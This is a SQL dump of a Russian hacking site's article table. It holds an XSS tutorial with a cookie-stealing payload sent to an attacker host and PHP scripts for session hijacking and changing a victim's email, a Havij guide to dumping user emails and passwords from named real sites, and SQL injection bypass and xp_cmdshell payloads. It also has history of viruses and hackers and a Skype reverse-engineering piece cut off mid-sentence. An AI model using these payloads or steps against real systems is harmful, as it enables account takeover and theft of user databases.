расположена доска объявлений, постинг этой ссылки на нее привел бы множество жертв. После того как жертва открывает ссылку, информация передается на сервер атакующего. Что именно он сможет сделать с данной информацией, мы рассмотрим позже. <br /><br />Скрипты, уязвимые к POST-вставке, лишь немногим сложнее атаковать. Поскольку POST-переменные передаются независимо от URL скрипта, необходимо использовать промежуточную страницу. Цель промежуточной страницы - заставить клиента отправить POST-запрос, содержащий нужный нам код. В следующем примере создается форма, в которой атакующей сформировал значения переменных, и отправляет от имени пользователя: <br /><br /><form name=f method=POST action="http://host/hello.php"><br /><input type=hidden name="name"<br />value="<script>document.location.replace<br />('http://attacker/payload?c='+document.cookie)</script>"><br /></form><br /><script>f.submit()</script><br /><br />После того как жертва откроет промежуточную страницу, она вынудит броузер отправить POST-запрос к hello.php, с переменной name установленной в <br /><br /><script>document.location.replace<br />('http://attacker/payload?c='+document.cookie)</script><br /><br />Цель атакующего достигнута, наш код передан уязвимой странице (3). <br /><br />Вместо вставки кода для перехода, атакующий может решить вставить код, который будет портить уязвимую страницу. Вставкой статичного HTML-кода атакующий может модифицировать отображаемое содержимое страницы. Там может находиться, к примеру код формы для логина, результат работы которой получит атакующий. Этот метод позволяет обойти средства идентификации такие как сертификаты сайтов или ручную проверку адреса клиентом. Если внедренный HTML-код будет позднее отображен на динамической странице (в гостевой книге, на форуме и т.п.), то страница будет выглядеть "взломанной". В общем, встраиваемый код может быть самым разным и полностью зависит от фантазии атакующего. <br />Использование<br /><br />После обнаружения уязвимой страницы, создания кода перехода, вставки его в уязвимую страницу и исполнения кода перехода броузером жертвы, остается сделать еще один шаг. Страница, на которую перекинуло жертву, должна выполнить некоторые действия. Они могут быть простейшими - например, вывод рекламы или запись данных, - или более сложными, например, перехват пользовательской сессии. Перенаправлением пользователя на другую страницу может, к примеру, решаться простая задача накрутки - перехват посетителей с атакуемой страницы. Чуть более сложной является задача протоколирования критичной информации (cookie) для последуюшего ручного использования. Следующий код записывает IP-адрес посетителя, значение Refereк и значение cookie, переданной через переменную "c":<br /><br />PHP код:<br /><?php <br />$f = fopen("log.txt", "a"); <br />fwrite($f, "IP: {$_SERVER['REMOTE_ADDR']} Ref: {$_SERVER <br />['HTTP_REFERER']} Cookie: {$HTTP_GET_VARS['c']}\n"); <br />fclose($f); <br />?> <br /><br />После того как атакующий получил значения cookie, он может извлечь из них полезную информацию, или попытаться перехватить сессию. Предполагая, что серверная сторона считает сессию незавершенной, атакующий может модифицировать свои cookie с целью перехвата сессии. Автоматизировав использование украденных cookie, атакующий значительно увеличивает свои шансы и упрощает атаку. При этом скрипт использует информацию, предоставленную обманутым клиентом, для выполнения своей задачи. В следующем примере скрипт атакующего использует cookie для получения исходного кода защищенной веб-страницы:<br /><br />PHP код:<br /><?php <br />$request = "GET /secret.php HTTP/1.0\r\n"; <br />$request .= "Cookie: {$HTTP_GET_VARS['c']}\r\n"; <br />$request .= "\r\n"; <br />$s = fsockopen("host", 80, $errno, $errstr, 30); <br />fputs($s, $request); <br />$content = ''; <br />while (!feof($s)) <br />{ <br />$content .= fgets($s, 4096); <br />} <br />fclose($s); <br />echo $content; <br />?> <br /><br />В этом случае /secret.php передается украденный cookie, после чего результат выводится в броузере. Модифицировав содержимое запроса, можно выполнить практически любую задачу от имени пользователя. Следующий код использует метод POST для смены почтового адреса пользователя без его ведома:<br /><br />PHP код:<br /><?php <br />$request = "POST /profile.php HTTP/1.0\r\n"; <br />$request .= "Cookie: {$HTTP_GET_VARS['c']}\r\n"; <br />$request .= "\r\n"; <br />$request .= "email=attacker@hotmail.com"; <br />$s = fsockopen("host", 80, $errno, $errstr, 30); <br />fputs($s, $request); <br />fclose($s); <br />echo "<script>document.location.replace <br />('http://google.com/')</script>"; <br />?> <br /><br />Данный код выполняет полноценную XSS-атаку. Без стороннего скрипта, управляемого атакующим, атака не раскрыла бы весь свой потенциал. <br />Заключение<br /><br />Последствия XSS-атак до сих пор остаются недооцененными специалистами по безопасности и разработчиками. Большинство обсуждающих их документов обычно рассматривают лишь фрагменты полной атаки. <br /><br />XSS-атаки начинаются с идентификации некорректно обработанного пользовательского ввода. После определения подходящей переменной, становится возможным внедрение кода. При внедрении кода, он может воспользоваться значениями переменных, доступных только в контексте данного сайта. В дальнейшем поток управления передаются для совершения определенных действий странице, которяа управляется атакующим. Действия могут быть простыми, как простая запись информации, или сложными, как перехват пользовательской сессии. При успешном выполнении всех этих этапов можно говорить о завершении полноценной XSS-атаки. <br />Ссылки<br />http://www.securityfocus.com/archive/107/341839 - реакция Ульфа Харнхаммара на статью по расширенному межсайтовому скриптингу. <br />http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html - Описание методов, используемых в HTTP/1.1. <br />http://libox.net/xss.php - Расширенный межсайтовый скриптинг, обсуждение способов использования POST-переменных (перевод - здесь). <br />http://www.securityfocus.com/archiv...09/2002-05015/0 - длинный список методов включения кода на javascript. <br />http://www.technicalinfo.net/papers/CSS.html - список других тегов, подходящих для использования","Анатомия межсайтового скриптинга<br />","journal_images/img_375356.png","1377069644","4");
INSERT INTO gazeta_article VALUES("155","22","Скачиваем две программы Sqlndm ,Havij 1.152 Pro<br />Ссылка на Sqlndm- http://rghost.ru/39015754<br /><br />Что бы на меня не сыпались проклятья качаем софт с иных сайтов!<br />1.Запускаем Sqlndm.<br />Программа собирает ссылки вида php? и проверяет их на наличие sql инъекции<br /><br />http://rghost.ru/40953122/image.png<br /><br />1.1 В первой строчке пишем запрос.( Любой-Порно,сиськи,vk,steam).Остальные строки оставляем без изменения!<br />1.2 Нажимаем кнопку parse.И ждем пока не остановится.<br />1.3 После того как программа собрала ссылки нажимаем кнопочку search.Ждем окончание процесса!<br />1.4 После этого в папке где у вас распакована программа откройте текстовый документ goodsql.Там будет список сайтов с sql инъекцией.<br /><br />Также можно искать сайты по другому.Достаточно найти сайты с приставкой php?id= Вот вам один пример<br />http://www.game-over.net/reviews.php?id=781 .В конце после чисел вставляем ' и если сайт с уязвим то мы увидим это.<br /><br />http://rghost.ru/40973045/image.png<br /><br />2 Запускаем Havij 1.152 Pro<br />Тык.Скачать! http://rghost.ru/40973136 VT https://www.virustotal.com/file/10dbc808cc083a9852f79..<br />4b1 691cad8c390dec/analysis/1350398114/<br />2.1 Открываем программу.И в строчке Target водим сайт который вы нашли( goodsql ) Вот вам один для примера http://www.life-prog.ru/forum/?group=5<br />2.2 Нажимаем кнопку Analyze и ждем пока идет анализ)<br />2.3 Если все успешно переходим во вкладку Tables.Ниже откроется еще одна таблица в ней нажимаем Get Tables.<br />2.4 Там будет много пунктов но нас интересует конкретно один и это User.В моем случае это Forum_User.C ставим на нем галочку!<br />http://rghost.ru/40953509/image.png<br />2.5 Потом нажимаем на кнопку Get Columns.Там будет много разных штучек),но нам нужно всего две колонки-E_mail,Password.Cтавим на них галочки.<br />http://rghost.ru/40953679/image.png<br />2.6 Самый конечный этап это уже слив баз.Нажимаем на кнопку Get Data и наслаждается результатом.(На многих сайтах пароли зашифрованы вам придется их расшифровать).<br />http://rghost.ru/40953973/image.png<br /><br />Программа для расшифровывания MD5 Хешей!<br />Тык.Скачать! (http://rghost.ru/40973841) VT (https://www.virustotal.com/file/6aa971fcac7dec4cb606c..<br />d96 362685553c774f/analysis/)<br />Программа принимает базы email;hash и так же просто hash.<br />http://rghost.ru/40973828/image.png","ВЗЛОМ САЙТА ОТ БД","journal_images/img_595073.jpeg","1377355142","642");
INSERT INTO gazeta_article VALUES("157","22","DoS-атака (атака типа «отказ в обслуживании», от англ. Denial of Service) — атака на вычислительную систему с целью довести её до отказа, то есть, создание таких условий, при которых легальные пользователи системы не могут получить доступ к предоставляемым системным ресурсам (серверам), либо этот доступ затруднён. Отказ «вражеской» системы может быть и шагом к овладению системой (если в нештатной ситуации ПО выдаёт какую-либо критическую информацию — например, версию, часть программного кода и т. д.). Но чаще это мера экономического давления: простой службы, приносящей доход, счета от провайдера и меры по уходу от атаки ощутимо бьют «цель» по карману.","Что такое ддос атака?","journal_images/img_711417.jpeg","1377355321","642");
INSERT INTO gazeta_article VALUES("158","22","Программа SQLRipper предназначена для изучения БД через ошибки в программном коде WEB- сайтов, т.н. SQL-инъекции.<br /><br />SQLRipper – это средство анализа безопасности сайтов использующий связку PHP - MySql. Мощные, гибкие и очень простые в использовании функции гарантируют удобство поиска и анализа SQL– инъекций.<br /><br />Возможности программы SQL Ripper – теперь еще более интеллектуальны, еще более удобны и абсолютно бесплатны. Полностью переработан движок программы. Теперь подключон модуль поиска ссылок на данной странице, с проверкой ссылок на SQL-инъекцию. <br /><br />Поиск относительных и абсолютных ссылок на WEB– странице<br />Поиск относительных и абсолютных ссылок по списку WEB– страниц<br />Задание максимального количества найденных ссылок на WEB– странице<br />Проверка ссылки на ошибку SQL Error<br />Возможность определения кол-ва полей запроса SELECT c помощью ORDER BY,GROUP BY,UNION SELECT<br />Точное определение полей вывода<br />Возможность замены пробелов на аналоги в случаях фильтрации<br />Возможность замены коментов на аналоги в случаях фильтрации<br />Сохранение промежуточных результатов парсинга в файл dbf<br />Проверка на SQL-инъекцию выборочных ссылок<br />Чтение структуры тип БД MsSQL<br />Сохранение структуры тип БД MsSQL в файле XML<br />Загрузка сохранённых файлов структуры БД из XML<br />Выгрузка произвольной таблицы тип БД MsSQL и сохранение её в dbf http://ozgi.spaces.ru/files/?LI=42104074413&LII=3597832805&LT=8&SN=1&from=search&link_id=635849&read=35978328","SQL Ripper - поиск уязвимостей сайта","journal_images/img_168950.jpeg","1377355416","642");
INSERT INTO gazeta_article VALUES("160","22","SQL Injection достаточно хорошая возможность для хакера получить доступ к серверу. И при небольшом усилии, он все-таки его получает :)<br />Coder inside<br />В наше время работа с базами данных поддерживается практически всеми языками программирования, к таким можно отнести BASIC, C++, Java, PERL, PHP, Assembler и даже JavaScript! А называются эти программы никак иначе как СУБД - системы управления базами данных. Зачастую базы данных применяются для решения финансовых задач, бухгалтерии, организации кадров, но свое применение они нашли и в Интернете.<br />Базы данных часто используются для написания WEB-приложений. Их использование наиболее уместно для хранения пользовательских регистрационных данных, идентификаторов сессий, организации поиска, а также других задач требующих обработки большего количества данных. Для обращения к БД используются серверные технологии: PHP, PERL, ASP, и т.д. Именно тут и начинается самое интересное. Когда на сервере установлены все патчи, а брандмауэр блокирует все порты кроме 80-ого или когда требуется аутентификация для доступа к некоторым данным, для взлома хакер может использовать SQL Injection. Суть данной атаки заключается в использовании ошибки на стыке WEB технологий и SQL. Дело в том, что многие web страницы для обработки пользовательских данных, формируют специальный SQL запрос к БД. Неосторожное использование данной методики может привести к довольно интересным результатам...<br /><br />SQL Injection<br />Для пояснения атаки представим себе, что ты зашел на сайт чтобы скачать одну очень важную тулзу и с ужасом замечаешь, что сделать это может только зарегистрированный пользователь, а регистрация, конечно же, стоит денег :) Последние заработанные отдавать не хочется, а без программы никак! Самое время вспомнить о том как обращаться к базам данных SQL. Например, проверка логина и пароля, на PHP может иметь следующий вид:<br />[code]$result=mysql_db_query($db,"SELECT * FROM $table WHERE user='$login' AND<br />pass='$password'"); <br />$num_rows=mysql_num_rows($result); <br />mysql_close($link); <br />if ($num_rows!=0) <br />{ <br />// AUTHENTICATION OK <br />} <br />else <br />{ <br />// AUTHENTICATION ERROR <br />}<br />[/code]<br /><br />Я добавил два комментария, "AUTHENTICATION OK " - вместо него должен идти код, который исполнится в том случае, если пароль и логин верны. Другой "AUTHENTICATION ERROR " - место где будет описан код, исполняющийся в случае их неправильности. Если заполнить форму, то запрос получится похожим на "http://www.server.com?login=user&password=31337", где www.server.com имя сервера, к которому мы пытаемся подключиться. Мы нашли то что искали, а по сему снова вернемся к работе SQL. Итак, если вы для авторизации должны указать логин и пароль, то сформированный SQL запрос будет иметь следующий вид:<br />[code]SELECT * FROM users WHERE login='user' AND password='31337'[/code]<br /><br />Это значит примерно следующее: верни мне все записи из базы данных users у которых логин "user", а пароль "31337". Если существует такая запись, значит пользователь зарегистрирован, ну а если нет, то нет... Но при определенных обстоятельствах все можно исправить. Имеется ввиду ситуация, когда приложение не проверяет содержимое передаваемых данных или проверяет не полностью, на наличие SQL инструкций. В данном примере сверяются два поля login и password, но если в качестве пароля указать "31337' AND email='user@server.com"(без двойных кавычек), то запрос получится уже немного другим:<br />[code]SELECT * FROM users WHERE login='user' AND password='31337' AND email='user@server.com'[/code]<br />И в случае существования поля email это условие также будет проверено. Если вспомнить основы булевой алгебры, то приходит в голову что кроме операции "и" существует и "или", а поскольку их использование поддерживается SQL, можно выше описанным способом добавить условие которое всегда возвращает истину. Для осуществления данного, необходимо в качестве логина указать "user' OR 1=1--", в таком случае запрос примет вид:<br />[code]SELECT * FROM users WHERE login='user' OR 1=1--' AND password='31337'[/code]<br /><br />Для начала следует знать, что "--" означает конец запроса, и все после "--" обрабатываться не будет! Получается, словно мы сделали запрос:<br />[code]SELECT * FROM users WHERE login='user' OR 1=1[/code]<br />Как вы видите мы добавили условие "1=1", значит критерием проверки будет "если логин 'user' или 1=1", но ведь 1 всегда равно 1 (исключением может быть только арифметика Дани Шеповалова :)). Чтобы проверить наши подозрения забиваем в адресной строке "http://www.server.com?login=user or 1=1--&password=31337". Это приводит к тому, что не играет роли какой именно логин мы указали, а тем более пароль! И мы в матри... ой, в системе и можем спокойно качать то что нам необходимо.<br /><br />Но это все в теории. На практике нам неизвестно каким образом формируется запрос, какие данные передаются и в какой последовательности. Поэтому необходимо указывать "user' OR 1=1--" для всех полей. Также следует проверить форму отправки на наличие скрытых полей. В HTML они описываются как "<INPUT TYPE=HIDDEN VALUE='значение' >". Если таковые существуют, сохраните страницу и поменяйте значения данных полей. Значения содержащиеся в них часто забывают проверять на наличие SQL инструкций. Но чтобы все заработало следует в форме (тэг "FORM") для параметра "ACTION" указать полный путь к скрипту, что обрабатывает данный запрос.<br /><br />Но не всегда также известно как сформирован запрос, прошлый пример можно было сформировать и следующими способами:<br />[code]SELECT * FROM users WHERE (login='user' AND password='31337')<br />SELECT * FROM users WHERE login="user" AND password="31337"<br />SELECT * FROM users WHERE login=user AND password=31337[/code]<br />и.т.д.<br /><br />В таком случае можно попробовать следующие варианты:<br />[code]<br />' OR 1=1--<br />" OR 1=1--<br />OR 1=1--<br />' OR 'a'='a<br />" OR "a"="a<br />') OR ('a'='a <br />OR '1'='1'[/code]<br /><br />Все зависит от предназначения скрипта, и от программиста. Поскольку каждому человеку свойственно все делать по своему, то вполне возможно, что программист выберет не самый простой вариант. Поэтому не следует сразу сдаваться, если вы получите отказ. Необходимо испробовать как можно большее количество вариантов...<br /><br /><br />Password detection<br /><br />Обходить авторизацию неплохо, но очень часто дырка которую вы используете закрывается, и все что было для вас доступно теряется. Этого и следовало ожидать, если программист не дурак он со временем прикроет все лазейки. От таких ситуаций можно легко избавится заранее позаботившись об этом. Правильным решением может стать угадывание пароля посредством анализа результатов аутентификации. Для начала пробуем угадать пароль, для этого введем место него:<br />[code]' OR password>'a[/code]<br />Если нам ответят, что авторизация пройдена, значит пароль начинается не на букву "а", а на какую-то из следующих по списку. Двигаемся дальше и подставляем место "a", следующие "b", "c", "d", "e"... и т.д. пока нам не ответят, что пароль не правильный. Пускай этот процесс остановился на символе "x", в таком случае создаются два варианта развития ситуации, пароль найден или же пароль начитается на этот символ. Чтобы проверить первый вариант пишем место пароля:<br />[code]' OR password='x[/code]<br />и если пароль принят и тебя впустили, значит ты угадал пароль! Ну а нет, тогда следует подбирать уже второй символ, точно так же, с начала. Для двух символов проверять нужно так же. В конце концов, ты получишь пароль, а логин ищешь тем самым путем :) В случае, если найденные пароль и логин тебя не устраивают, можешь отыскать и другие. Для этого необходимо начать проверку с последнего символа найденного пароля. Так, если пароль был "xxx" проверять необходимо существование пароля "xxy":<br />[code]' OR password='xxx[/code]<br />чтобы не упустить не один вариант!<br /><br />MS SQL Server<br /><br />MS SQL Server вообще находка, если упущена необходимая фильтрация. Используя уязвимость SQL Injection можно исполнять команды на удаленном сервере с помощью exec master..xp_cmdshell. Но чтобы использовать эту конструкцию необходимо завершить операцию "SELECT". В SQL инструкции разделяются точкой с запятой. Поэтому подключится к некоторому IP по Telnet'у, необходимо место пароля/логина набрать:<br />[code]<br />'; exec master..xp_cmdshell 'telnet 192.168.0.1' --[/code]<br />У MS SQL Server есть, еще несколько интересных особенностей, позволяющих узнать логины и пароли хранящиеся в базе данных. Для этого вывод об ошибках перенаправляется на произвольный сервер и посредствам их анализа можно узнать название таблицы, полей и их типов. После чего можно запросом:<br />[code]' UNION SELECT TOP 1 login FROM users--[/code]<br />(login имя поля содержащего логин, а users - имя таблицы, полуученые в процессе анализа ошибок).<br /><br />Ответ может быть следующим:<br />[code]Microsoft OLE DB Provider for ODBC Drivers error '80040e07' <br />[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin' to a column of data type int. <br />/default.asp, line 27[/code]<br /><br />Теперь мы знаем, что есть пользователь с именем "admin". Теперь мы можем получить его пароль:<br />[code]' UNION SELECT TOP 1 password FROM users where login='admin'--[/code]<br />Результат:<br />[code]Microsoft OLE DB Provider for ODBC Drivers error '80040e07' <br />[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'xxx' to a column of data type int. <br />/tedault.asp, line 27[/code]<br />Теперь нам известно, что есть пользователь "admin" с паролем "xxx". Этим можно смело воспользоваться и залогинится в систему. ;)<br />Но для работы с SQL существует еще много других функций, при работе с базой данных можно также удалять данные, модифицировать, вставлять свои и даже манипулировать файлами и работать с реестром. В общем, SQL Server - рулит :)<br />Защита<br />Но этого всего естественно можно избежать. Для этого можно воспользоваться фильтрами, предоставляемыми производителями. Можно найти свои решения, например заменять все одинарные кавычки двойными (если для SQL запроса мы пользуетесь одинарными), или наоборот. Можно разрешить только использование букв и с@баки, в случае если требуется ввести электронный адрес. А еще в перле есть удивительная функция :) quote() в модуле DBI::DBD, которая успешно делает ваш запрос безопасным по отношению к SQL. Решений много, необходимо просто ими воспользоваться. Иначе зачем тогда все это...","sql injection","journal_images/img_874629.gif","1377785059","3");
INSERT INTO gazeta_article VALUES("161","22","Хакер (от англ. hack — разрубать) — чрезвычайно квалифицированный ИТ-специалист, человек, который понимает самые основы работы компьютерных систем.<br /> <br />Изначально хакерами называли программистов, которые исправляли ошибки в программном обеспечении каким-либо быстрым и далеко не всегда элегантным (в контексте используемых в программе стиля программирования и ее общей структуры, дизайна интерфейсов) или профессиональным способом; такие правки ассоциировались с «топорной работой» из-за их грубости, отсюда и произошло название «хакер»[источник не указан 287 дней].<br /> <br />Сейчас хакеров очень часто путают с компьютерными взломщиками — крэкерами (от англ. crack — ломающий); такое употребление слова «хакер» неверно.<br /> <br />Значение слова «хакер» в первоначальном его понимании, вероятно, возникло в стенах MIT в 1960-е задолго до того, как компьютеры стали широко распространены.<br /> <br />Тогда оно являлось частью местного сленга и могло обозначать простое, но грубое решение какой-либо проблемы; чертовски хитрую проделку студентов (обычно автора и называли хакером).<br /> <br />До того времени слова «hack» и «hacker» использовались по разным поводам безотносительно к компьютерной технике вообще.","кто такой хакер","journal_images/img_323814.gif","1378233588","3");
INSERT INTO gazeta_article VALUES("162","22","<br />Легендарные вирусы.<br />Идея создания подобных программ появилась еще в 50-е года, а в 60-е появились первые рабочие программы. В начале 80-х годов компьютер Apple II становится первым объектом интереса для создателей таких вирусов как Virus 1,2,3 и Elk Cloner — пользователей вирус приветствовал небольшим стихотворением. К концу 80-х начинаются настоящие вирусные эпидемии. 1987 год ознаменовался сразу тремя вирусными атаками. Пакистанский вирус, или вирус Brain, заразил в США свыше 18 тысяч компьютеров. Изначально программа должна была наказывать местных пакистанских «пиратов», однако внезапно вышла за пределы страны и заразила сотни компьютеров по всему миру. Вторая волна эпидемии случилась в Лехайском университете (США): вирус за несколько дней уничтожил содержимое нескольких сот дискет из библиотеки вычислительного центра университета и личных дискет студентов. Последняя эпидемия настигла перед Новым годом: вирус из Иерусалимского Университета быстро распространился по всему миру, правда серьезного вреда никому не нанес.<br />Один из самых известных вирусов прошлого (кстати, он до сих пор остается одним из самых опасных) носит название «Чернобыль». Вирус был создан выпускником тайваньского университета Ченом Инь Хау в 1997 году и его действие напоминало действие бомбы с таймером. Сначала вирус скромно прятался на диске, а в час «икс» — 26 апреля — годовщину аварии на Чернобыле и день рождение своего создателя — вирус нещадно удалял все содержимое жесткого диска и временами даже портил BIOS, превращая компьютер в груду металла. Жертвами чернобыльского вируса «пали» около 500 тысяч компьютеров.<br />Вирус с нежным названием ILOVEYOU начал орудовать в 2000-е годы по средствам электронной почты и съемных носителей. Вирус запускал добавленный к письму скрипт, замаскированный под текстовый файл с признанием в любви от девушки. Ему удалось просочиться не только на домашние ПК, но и на рабочие и даже компьютеры Пентагона. Основной ущерб ILOVEYOU причинял во время удаления, так как для этого отключались многие сети и даже почтовые серверы.<br />В 2004 году увидела свет вредоносная программа, получившая почетное звание одного из первых «уничтожителей Интернета». Гигантский ботнет MyDoom распространялся по электронке, и в течение первых дней каждое десятое письмо содержало этот вирус. Вирус известен наличием 18 версий, фразами «I’m just doing my job, nothing personal, sorry» и DDoS атаками на сервера Microsoft и SCO Group.<br />Один из наиболее опасных вирусов настоящего появился в 2008 году. Conficker объектом своего действия выбрал Microsoft Windows. Вредитель блокировал доступ ко всем сайтам с антивирусами и обновлениями операционной системы, а в 2009 году сумел поразить жизнеспособность 12 миллионов ПК по всему миру. Microsoft обещала вознаграждение в размере 250 000 долларов за имя создателя Conficker.<br />Один из последних созданных вирусов в 2012 году был найден специалистами «лаборатории Касперского». Компьютерный червь Flame способен выполнять разнообразные действия вредоносного характера, например, похищать и уничтожать конфиденциальную информацию и взаимодействовать с другими вредоносными программами.<br />... и маститые взломщики<br />Один из первых хакеров компьютерного мира, Джон Дрейпер, появился на свет в далеком 1944 году в небольшом городке Военно-воздушной базы США в Силиконовой долине. Прозвище капитан Кранч (Cap’n Crunch) приклеилось к нему по названию кукурузных хлопьев. Именно в них он нашел подарок — игрушечный свисток, с помощью которого начал свою хакерскую карьеру. Дело в том, что свисток имитировал сигнал доступа в телефонную сеть, и Дрейпер придумал оригинальный способ звонить бесплатно. Дрейпер считается основоположником движения телефонных фрикеров — взломщиков телефонных сетей, однако за продвижение этой идеи и оборудования для бесплатных звонков в 70-е годы он угодил в тюрьму. Позже Дрейпер переключился на компьютеры, разрабатывал программное обеспечение в компании его друзей Возняка и Джобса — Apple.<br />Сегодня Джон Дрейпер находится по другую сторону: он входит в группу ведущих исследователей в области информационной безопасности и возглавляет собственную компанию по разработке систем защиты от спама и отражения хакерских атак.<br />Имя Кевина Митника успело стать нарицательным: на его счету — не одна громкая «победа» над компьютерной системой. Первой в 1980 году была взломана школьная локальная система. После последовали куда более серьезные системы. В 1981 году (Митнику исполнилось 17 лет) он взломал компьютерную сеть Североамериканской Противовоздушной обороны в Колорадо. Но настоящей его «страстью» стала телефония. Взломав сеть крупной телефонной компании Pacific Bell, он скопировал учебники по применяемым в то время технологиям связи и программы для работы с ними. После Митник совершил поступок каждого уважающего себя хакера. Взломав компьютер университета в Лос-Анджелесе, Кевин атаковал с него Пентагон. «Шутка» не прошла и Митника приговорили к 6 месяцам тюрьмы.<br />Кстати<br />В 2000 году в США был снят художественный фильм «Взлом» о жизни Кевина Митника, роль которого исполнил Скит Ульрих. В картине подробно описана «карьера» хакера от первых телефонных взломов вплоть до его противостояния с Цутому Симомурой.<br />80-90-е годы были для Митника действительно «лихими»: тюремный срок, курс лечения от «компьютерной зависимости», спокойная жизнь и затем федеральный розыск, взломы телефонных компаний и новый срок заключения. Крах случился в 1994 году, когда Митник пытался взломать домашний компьютер ведущего американского специалиста по компьютерной безопасности Цутому Симомуры. В 1995 году его арестовали и после предъявления 23 обвинений и установления ущерба свыше 80 млн. долларов, Митник оказался в тюрьме на 4 года.<br />Теперь Кевин Митник — добропорядочный гражданин США, занимается вопросами сетевой безопасности и пишет книжки с реальными историями из жизни хакеров.<br />Главный редактор журнала о компьютерных технологиях Wired News Кевин Поулсен тоже давно оставил шпионские игры. А некогда Поулсен взламывал такие мощные системы, как у ФБР и получал доступ к засекреченной информации, касающейся прослушивания телефонных разговоров. После этой выходки ему пришлось долго скрываться от агентов ФБР, менять адреса и даже внешность. В итоге хакера поймали и осудили на пять лет. Из тюрьмы он вышел вполне законопослушным и занялся журналистикой.<br />Такие гиганты как Microsoft, NY Times, Yahoo, Citigroup, Bank of America и Cingular пострадали от рук другого взломщика — Адриана Ламо. Он использовал интернет на всех доступных компьюетрах, за что получил прозвище «бездомный хакер». Ламо развлекался тем, что находил ошибки в безопасности известных компаний, использовал их для взлома, а после информировал руководство об этих ошибках. Однако вторжение в сеть NY Times повлекло за собой 6 месяцев домашнего ареста, 2 года испытательного срока и 65 тысяч долларов в качестве компенсации пострадавшей стороне. Сейчас Ламо является независимым консультантом по безопасности, читает лекции и пишет статьи.<br />Роберт Тэппэн Моррис, адъюнкт-профессор Массачусетского технологического института, известен созданием первого в мире сетевого червя. Первая же атака оказалась успешной: 2 ноября 1988 года работа шести тысяч компьютеров в США была парализована. В июле 1989 ему было предъявлено обвинение в компьютерном мошенничестве — впервые в судебной практике, а в 90-м году Морриса приговорили к трем годам пробации, 400 часам общественных работ и штрафу на 10 тысяч долларов.<br />«Крупнейший взлом военных компьютеров за всю историю» приписывают шотландскому хакеру Гэри Маккиннону. Согласно обвинению, Маккиннон взламывал компьютеры NASA, сети Национального управления по воздухоплаванию и исследованию космического пространства, Министерства обороны, Армии, ВМС и ВВС США. Более того, хакер удалил критически важные файлы в операционной системе, что сделало невозможным использование более 2000 компьютеров в военном округе Вашингтона в течение суток, и удалил журналы регистрации оружия ВМС США. В свою очередь Маккиннон отрицает нанесение ущерба, объясняя это тем, что только искал утаиваемые материалы о существовании НЛО. Дело Маккинона рассматривается уже несколько лет и вопрос об экстрадиции его в США, где ему грозит 70 лет тюремного заключения, так и не решен.","о вирусах","journal_images/img_127416.gif","1378234118","3");
INSERT INTO gazeta_article VALUES("163","21","Skype представляет собой одну из самых популярных VoIP-программ, установленную на миллионах компьютеров по всему миру, владельцы которых даже и не подозревают, какая опасность им грозит. А опасность им грозит весьма серьезная: от утечки конфиденциальной информации до проникновения червей и попадания на трафик, не говоря уже о таких мелочах, как нежелание Skype работать при активном SoftICE. Я все это благополучно разгрыз и теперь выставляю продукты своей жизнедеятельности на всеобщее обозрение :).<br />Skype, созданный отцами-основателями скандально известной Kazaa и унаследовавший от своей прародительницы самые худшие ее черты, работает по принципу самоорганизующейся распределенной пиринговой сети (distributed self-organized peer-to-peer network, P2P). Skype – это черный ящик с многоуровневой системой шифрования напичканного антиотладочными приемами исполняемого файла, считывающий с компьютера конфиденциальную информацию и передающий ее в сеть по закрытому протоколу. Последний обходит брандмауэры и сурово маскирует свой трафик, препятствуя его блокированию. Все это превращает Skype в идеального переносчика вирусов, червей и дронов, создающих свои собственные распределенные сети внутри Skype-сети. К тому же Skype довольно бесцеремонно обращается с ресурсами твоего узла, используя его для поддержания связи между остальными узлами Skype-сети, напрягая ЦП и генерируя мощный поток трафика. А трафик, как известно, редко бывает бесплатным (особенно в России), так что кажущаяся бесплатность звонков весьма условна: за узлы с «тонкими» каналами расплачиваются «толстые» владельцы.<br />Skype активно изучается в хакерских лабораториях и security-организациях по всему миру, и большинство исследователей единодушно сходятся во мнении, что Skype это дьявольски хитрая программа, написанная бесспорно талантливыми людьми в стиле Black Magic Art. Skype не брезгует грязными трюками, создающими огромные проблемы, о которых я и собираюсь рассказать.<br />Анализ исполняемого файла<br />Исполняемый файл Skype-клиента представляет собой настоящий шедевр хакерского искусства, вобравший в себя множество интересных и достаточно могучих защитных механизмов. Для противодействия им требуются не только мощные инструментальные средства (отладчики, дизассемблеры, дамперы и т.д.) и знания/навыки, но еще и куча свободного времени.<br />Двоичный файл полностью зашифрован и динамически расшифровывается по мере загрузки в память. Причем сброс дампа невозможен, точнее, затруднен тем обстоятельством, что стартовый код после выполнения очищается, в результате чего мы получаем exe, который не запускается. Оригинальная таблица импорта не содержит ничего интересного, и API-функции подключаются уже в процессе распаковки. Проверка целостности кода выполняется из разных мест в случайном порядке (преимущественно при входящих звонках), поэтому поиск защитных процедур представляет собой весьма нетривиальную задачу. Тем более что они основаны на криптографических RSA-сигнатурах и снабжены полиморфными генераторами, которые в случайном порядке переставляют инструкции ADD, XOR, SUB и др., перемешивая их с левыми машинными командами.<br />Статический вызов функций (по жестко прописанному адресу) практически не встречается, и все важные процедуры вызываются по динамически вычисляемому указателю, пропущенному через обфускатор. Следовательно, дизассемблер нам тут уже не поможет, и приходится браться за отладчик.<br />А вот про отладчик следует сказать отдельно. Skype распознает SoftICE даже при наличии установленного IceExt, наотрез отказываясь запускаться. Это забавно, поскольку для взлома самого Skype отладчик SoftICE не очень-то и нужен, ведь существуют и другие инструменты подобного рода, среди которых в первую очередь хотелось бы отметить The Rasta Ring 0 Debugger, или сокращенно [RR0D], не обнаруживаемый Skype-клиентом и, как и следует из его названия, работающий на уровне ядра. В принципе можно воспользоваться и отладчиком прикладного уровня (например, стремительно набирающим популярность OllyDbg). Только при этом важно помнить, что Skype легко обнаруживает программные точки останова, представляющие собой однобайтовую машинную инструкцию с опкодом CCh, записывающуюся поверх отлаживаемого кода. А для предотвращения пошаговой трассировки Skype осуществляет замеры времени выполнения определенных участков кода, для прохождения через которые приходится использовать полноценные эмуляторы PC с интегрированным отладчиком, например знаменитый BOCHS.<br />Наконец, когда исполняемый файл распакован и все проверки пройдены, защита вычисляет контрольную сумму и преобразует ее в указатель, по которому передается управление, пробуждающее Skype.<br />Проблема в том, что Skype очень следит за своей целостью, поэтому попытка исправления jnz на jmp short работает только до первого входящего звонка, после которого Skype падает и обратно уже не поднимается. Специально для таких хитроумных защит еще во времена MS-DOS была разработана техника онлайн-патча, при которой 